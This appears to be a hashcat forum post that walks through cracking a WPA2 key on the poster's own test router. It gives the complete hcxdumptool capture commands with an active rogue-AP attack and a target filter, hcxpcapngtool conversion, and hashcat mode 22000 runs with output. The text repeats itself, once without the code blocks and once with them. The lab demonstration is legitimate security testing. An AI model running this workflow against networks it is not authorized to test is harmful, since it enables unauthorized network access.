Environment 1:
router: TP-Link TL-WR841N - encryption: WPA2 - wifi channel 11 (fixed)
We use the example password "hashcat!" from
https://hashcat.net/wiki/doku.php?id=example_hashes
client: notebook
get target information:
set monitor mode and create attack filter tailored to the target:
This is not mandatory, but we do not want to disturb/jam the entire neighborhood.
run attack:
convert to hash file hc22000:
Please notice that I excluded undirected PROBEREQUEST frames when creating the packet filter. We don't need them for this small test.
hcxpcapngtool noticed that and gave a warning.
If you want to include them, you have to modify the filter this way:
run hashcat to recover the PSK:
The complete process (preparing environment -> recovered PSK) took no more than 5 minutes.
From my point of view, the new hash mode 22000 is fantastic. Running hashcat (mode 22000) in combination with hcxdumptool/hcxlabtool and hcxtools even my GTX 1650 is fast enough to recover a PSK in a short time.
Environment 2:
To verify that hcxpcapngtool -> hashcat is working es expected, you can use this example dump file (in pcap format) from:
https://wiki.wireshark.org/SampleCaptures
convert to hash file hc22000:
get a good (and small) wordlist:
run hashcat to recover the example PSK:
And again, my GTX 1650 is fast enough to recover the PSK in less than a minute.
BTW:
It would be a good style if you would describe your steps exactly (description of environment - that include your distrubution, hashcat version, hcxdumptool version, hcxpcapngtool version, used command lines and expected results).
And the password for this two hashes
https://hashcat.net/forum/thread-10805-p...l#pid55450
is not(!) in rockyou.txt, so you should remove them.
Unfortunately you have not provided information about the environment and how you captured/converted them
If you like to reproduce the workflow from environment 1.
Download and convert the attached example dump file.
Get the word list as described in environment 2.
Run hashcat to recover the PSK.
Feel free to comment how long it took to recover the PSK so we can see if hash mode 22000 is really "useless garbage".
I'll open:
GTX 1650
$ hashcat -m 22000 test.22000 cracked.txt.gz
Recovered.Total..: 1/1 (100.00%) Digests
Started: Mon May 30 18:02:18 2022
Stopped: Mon May 30 18:02:21 2022
router: TP-Link TL-WR841N - encryption: WPA2 - wifi channel 11 (fixed)
We use the example password "hashcat!" from
https://hashcat.net/wiki/doku.php?id=example_hashes
client: notebook
get target information:
Code:
$ sudo hcxdumptool -i wlp39s0f3u1u1u2 --do_rcascan -c 11
BSSID FREQ CH RSSI BEACON RESPONSE ESSID SCAN-FREQ: 2462 INJECTION-RATIO: 100% [13:11:05]
-----------------------------------------------------------------------------------------------------
6466b38ec3fc 2462 11 -31 24 23 TP-LINK_HASHCAT_TESTset monitor mode and create attack filter tailored to the target:
Code:
$ sudo hcxdumptool -m wlp39s0f3u1u1u2
$ sudo tcpdump -i wlp39s0f3u1u1u2 wlan addr1 6466b38ec3fc or wlan addr2 6466b38ec3fc or wlan addr3 6466b38ec3fc -ddd > target.bpfcrun attack:
Code:
$ sudo hcxdumptool -i wlp39s0f3u1u1u2 -c 11 -o test.pcapng --enable_status=15 --bpfc=target.bpfc --active_beacon
initialization of hcxdumptool 6.2.6-10-g36ce1fb (depending on the capabilities of the device, this may take some time)...
interface is already in monitor mode, skipping ioctl(SIOCSIWMODE) and ioctl(SIOCSIFFLAGS) system calls
start capturing (stop with ctrl+c)
NMEA 0183 SENTENCE........: N/A
PHYSICAL INTERFACE........: phy0
INTERFACE NAME............: wlp39s0f3u1u1u2
INTERFACE PROTOCOL........: IEEE 802.11
INTERFACE TX POWER........: 20 dBm (lowest value reported by the device)
INTERFACE HARDWARE MAC....: 74da38f2038e (not used for the attack)
INTERFACE VIRTUAL MAC.....: 74da38f2038e (not used for the attack)
DRIVER....................: mt7601u
DRIVER VERSION............: 5.18.0-arch1-1
DRIVER FIRMWARE VERSION...: N/A
openSSL version...........: 1.1
ERRORMAX..................: 100 errors
BPF code blocks...........: 33
FILTERLIST ACCESS POINT...: 0 entries
FILTERLIST CLIENT.........: 0 entries
FILTERMODE................: unused
WEAK CANDIDATE............: 12345678
ESSID list................: 0 entries
ACCESS POINT (ROGUE)......: 000e175c955e (BROADCAST WILDCARD used for the attack)
ACCESS POINT (ROGUE)......: 000e175c955f (BROADCAST OPEN used for the attack)
ACCESS POINT (ROGUE)......: 000e175c9560 (used for the attack and incremented on every new client)
CLIENT (ROGUE)............: b0ece1ad5e88
EAPOLTIMEOUT..............: 20000 usec
EAPOLEAPTIMEOUT...........: 2500000 usec
REPLAYCOUNT...............: 63271
ANONCE....................: 2c1480188261ae8ecb947768c0838ebf2bc650f41e443656a64a0af314f36e5d
SNONCE....................: 358c7cc83ff0600a54c79e5660a9763a54abde52564c5203eb9db3caf722341a
TIME FREQ/CH MAC_DEST MAC_SOURCE ESSID [FRAME TYPE]
13:24:05 2462/11 ffffffffffff 6466b38ec3fc TP-LINK_HASHCAT_TEST [BEACON]
13:24:06 2462/11 225edc49b7aa 6466b38ec3fc TP-LINK_HASHCAT_TEST [AUTHENTICATION]
13:24:06 2462/11 225edc49b7aa 6466b38ec3fc TP-LINK_HASHCAT_TEST [ASSOCIATION]
13:24:06 2462/11 225edc49b7aa 6466b38ec3fc TP-LINK_HASHCAT_TEST [EAPOL:M2M3 EAPOLTIME:4227 RC:2 KDV:2]
13:24:06 2462/11 225edc49b7aa 6466b38ec3fc TP-LINK_HASHCAT_TEST [EAPOL:M3M4ZEROED EAPOLTIME:9937 RC:2 KDV:2]
^C
terminating...convert to hash file hc22000:
Code:
$ hcxpcapngtool -o test.hc22000 test.pcapng
hcxpcapngtool 6.2.7-5-gd66ebbf reading from test.pcapng...
summary capture file
--------------------
file name.................................: test.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 5.18.0-arch1-1
application..............................: hcxdumptool 6.2.6-10-g36ce1fb
interface name...........................: wlp39s0f3u1u1u2
interface vendor.........................: 74da38
openSSL version..........................: 1.1
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: 000e175c9560 (incremented on every new client)
MAC CLIENT...............................: b0ece1ad5e88
REPLAYCOUNT..............................: 63271
ANONCE...................................: 2c1480188261ae8ecb947768c0838ebf2bc650f41e443656a64a0af314f36e5d
SNONCE...................................: 358c7cc83ff0600a54c79e5660a9763a54abde52564c5203eb9db3caf722341a
timestamp minimum (GMT)..................: 30.05.2022 13:24:05
timestamp maximum (GMT)..................: 30.05.2022 13:24:07
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianess (capture system)...............: little endian
packets inside...........................: 114
packets received on 2.4 GHz..............: 112
ESSID (total unique).....................: 1
BEACON (total)...........................: 1
BEACON on 2.4 GHz channel (from IE_TAG)..: 11
AUTHENTICATION (total)...................: 2
AUTHENTICATION (OPEN SYSTEM).............: 2
ASSOCIATIONREQUEST (total)...............: 1
ASSOCIATIONREQUEST (PSK).................: 1
EAPOL messages (total)...................: 109
EAPOL RSN messages.......................: 109
EAPOLTIME gap (measured maximum usec)....: 43208
EAPOL ANONCE error corrections (NC)......: working
REPLAYCOUNT gap (recommended NC).........: 8
EAPOL M1 messages (total)................: 106
EAPOL M2 messages (total)................: 1
EAPOL M3 messages (total)................: 1
EAPOL M4 messages (total)................: 1
EAPOL pairs (total)......................: 2
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file....: 1 (RC checked)
EAPOL M32E2 (authorized).................: 1
frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
2462: 112
Information: missing frames!
This dump file does not contain undirected proberequest frames.
An undirected proberequest may contain information about the PSK.
It always happens if the capture file was cleaned or
it could happen if filter options are used during capturing.
That makes it hard to recover the PSK.
session summary
---------------
processed pcapng files................: 1Please notice that I excluded undirected PROBEREQUEST frames when creating the packet filter. We don't need them for this small test.
hcxpcapngtool noticed that and gave a warning.
If you want to include them, you have to modify the filter this way:
Code:
$ sudo tcpdump -i wlp39s0f3u1u1u2 wlan addr1 ffffffffffff or wlan addr1 6466b38ec3fc or wlan addr2 6466b38ec3fc or wlan addr3 6466b38ec3fc -ddd > target.bpfcrun hashcat to recover the PSK:
Code:
$ hashcat -m 22000 test.hc22000 -a 3 hashcat!
hashcat (v6.2.5-439-ged3b52185) starting
nvmlDeviceGetFanSpeed(): Not Supported
CUDA API (CUDA 11.7)
====================
* Device #1: NVIDIA GeForce GTX 1650, 3852/3911 MB, 16MCU
OpenCL API (OpenCL 3.0 CUDA 11.7.57) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #2: NVIDIA GeForce GTX 1650, skipped
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1084 MB
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
024022795224bffca545276c3762686f:6466b38ec3fc:225edc49b7aa:TP-LINK_HASHCAT_TEST:hashcat!
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: test.hc22000
Time.Started.....: Mon May 30 13:27:52 2022 (0 secs)
Time.Estimated...: Mon May 30 13:27:52 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: hashcat! [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 29 H/s (0.20ms) @ Accel:32 Loops:64 Thr:256 Vec:1
Recovered.Total..: 1/1 (100.00%) Digests
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: hashcat! -> hashcat!
Hardware.Mon.#1..: Temp: 47c Util: 26% Core:1770MHz Mem:3500MHz Bus:8
Started: Mon May 30 13:27:49 2022
Stopped: Mon May 30 13:27:54 2022The complete process (preparing environment -> recovered PSK) took no more than 5 minutes.
From my point of view, the new hash mode 22000 is fantastic. Running hashcat (mode 22000) in combination with hcxdumptool/hcxlabtool and hcxtools even my GTX 1650 is fast enough to recover a PSK in a short time.
Environment 2:
To verify that hcxpcapngtool -> hashcat is working es expected, you can use this example dump file (in pcap format) from:
https://wiki.wireshark.org/SampleCaptures
Code:
$ wget https://wiki.wireshark.org/uploads/__moin_import__/attachments/SampleCaptures/wpa-Induction.pcapconvert to hash file hc22000:
Code:
$ hcxpcapngtool -o wpa-induction.hc22000 wpa-Induction.pcap
hcxpcapngtool 6.2.7-5-gd66ebbf reading from wpa-Induction.pcap...
summary capture file
--------------------
file name.................................: wpa-Induction.pcap
version (pcap/cap).......................: 2.4 (very basic format without any additional information)
timestamp minimum (GMT)..................: 04.01.2007 07:14:45
timestamp maximum (GMT)..................: 04.01.2007 07:15:26
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianess (capture system)...............: little endian
packets inside...........................: 1093
frames with correct FCS..................: 1080
WIRELESS DISTRIBUTION SYSTEM.............: 1
ESSID (total unique).....................: 2
BEACON (total)...........................: 398
BEACON on 2.4 GHz channel (from IE_TAG)..: 1
PROBEREQUEST.............................: 12
PROBEREQUEST (directed)..................: 1
PROBERESPONSE (total)....................: 26
DISASSOCIATION (total)...................: 1
AUTHENTICATION (total)...................: 2
AUTHENTICATION (OPEN SYSTEM).............: 2
ASSOCIATIONREQUEST (total)...............: 1
ASSOCIATIONREQUEST (PSK).................: 1
RESERVED MANAGEMENT frame................: 4
WPA encrypted............................: 280
EAPOL messages (total)...................: 4
EAPOL RSN messages.......................: 4
EAPOLTIME gap (measured maximum usec)....: 4998
EAPOL ANONCE error corrections (NC)......: working
REPLAYCOUNT gap (recommended NC).........: 8
EAPOL M1 messages (total)................: 1
EAPOL M2 messages (total)................: 1
EAPOL M3 messages (total)................: 1
EAPOL M4 messages (total)................: 1
EAPOL pairs (total)......................: 2
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file....: 1 (RC checked)
EAPOL M32E2 (authorized).................: 1
PMKID (total)............................: 1
PMKID (from zeroed PMK)..................: 1
frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
not available due to missing radiotap header
Information: limited dump file format detected!
This file format is a very basic format to save captured network data.
It is recommended to use PCAP Next Generation dump file format (or pcapng for short) instead.
The PCAP Next Generation dump file format is an attempt to overcome the limitations
of the currently widely used (but limited) libpcap (cap, pcap) format.
https://www.wireshark.org/docs/wsug_html_chunked/AppFiles.html#ChAppFilesCaptureFilesSection
https://github.com/pcapng/pcapng
Information: missing frames!
This dump file does not contain enough EAPOL M1 frames.
It always happens if the capture file was cleaned or
it could happen if filter options are used during capturing.
That makes it impossible to calculate nonce-error-correction values.
session summary
---------------
processed cap files...................: 1get a good (and small) wordlist:
Code:
$ wget https://wpa-sec.stanev.org/dict/cracked.txt.gzrun hashcat to recover the example PSK:
Code:
$ hashcat -m 22000 wpa-induction.hc22000 cracked.txt.gz
hashcat (v6.2.5-439-ged3b52185) starting
nvmlDeviceGetFanSpeed(): Not Supported
CUDA API (CUDA 11.7)
====================
* Device #1: NVIDIA GeForce GTX 1650, 3852/3911 MB, 16MCU
OpenCL API (OpenCL 3.0 CUDA 11.7.57) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #2: NVIDIA GeForce GTX 1650, skipped
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1084 MB
Dictionary cache built:
* Filename..: cracked.txt.gz
* Passwords.: 358090
* Bytes.....: 3881090
* Keyspace..: 358090
* Runtime...: 0 secs
a462a7029ad5ba30b6af0df391988e45:000c4182b255:000d9382363a:Coherer:Induction
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: wpa-induction.hc22000
Time.Started.....: Mon May 30 14:26:50 2022 (2 secs)
Time.Estimated...: Mon May 30 14:26:52 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (cracked.txt.gz)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 85823 H/s (11.14ms) @ Accel:64 Loops:256 Thr:32 Vec:1
Recovered.Total..: 1/1 (100.00%) Digests
Progress.........: 131072/358090 (36.60%)
Rejected.........: 0/131072 (0.00%)
Restore.Point....: 98304/358090 (27.45%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: E5EB6C05AE -> DMCJUWPR
Hardware.Mon.#1..: Temp: 41c Util: 39% Core:1545MHz Mem:3500MHz Bus:8
Started: Mon May 30 14:26:48 2022
Stopped: Mon May 30 14:26:52 2022BTW:
It would be a good style if you would describe your steps exactly (description of environment - that include your distrubution, hashcat version, hcxdumptool version, hcxpcapngtool version, used command lines and expected results).
And the password for this two hashes
https://hashcat.net/forum/thread-10805-p...l#pid55450
is not(!) in rockyou.txt, so you should remove them.
Unfortunately you have not provided information about the environment and how you captured/converted them
If you like to reproduce the workflow from environment 1.
Download and convert the attached example dump file.
Get the word list as described in environment 2.
Run hashcat to recover the PSK.
Feel free to comment how long it took to recover the PSK so we can see if hash mode 22000 is really "useless garbage".
I'll open:
GTX 1650
$ hashcat -m 22000 test.22000 cracked.txt.gz
Recovered.Total..: 1/1 (100.00%) Digests
Started: Mon May 30 18:02:18 2022
Stopped: Mon May 30 18:02:21 2022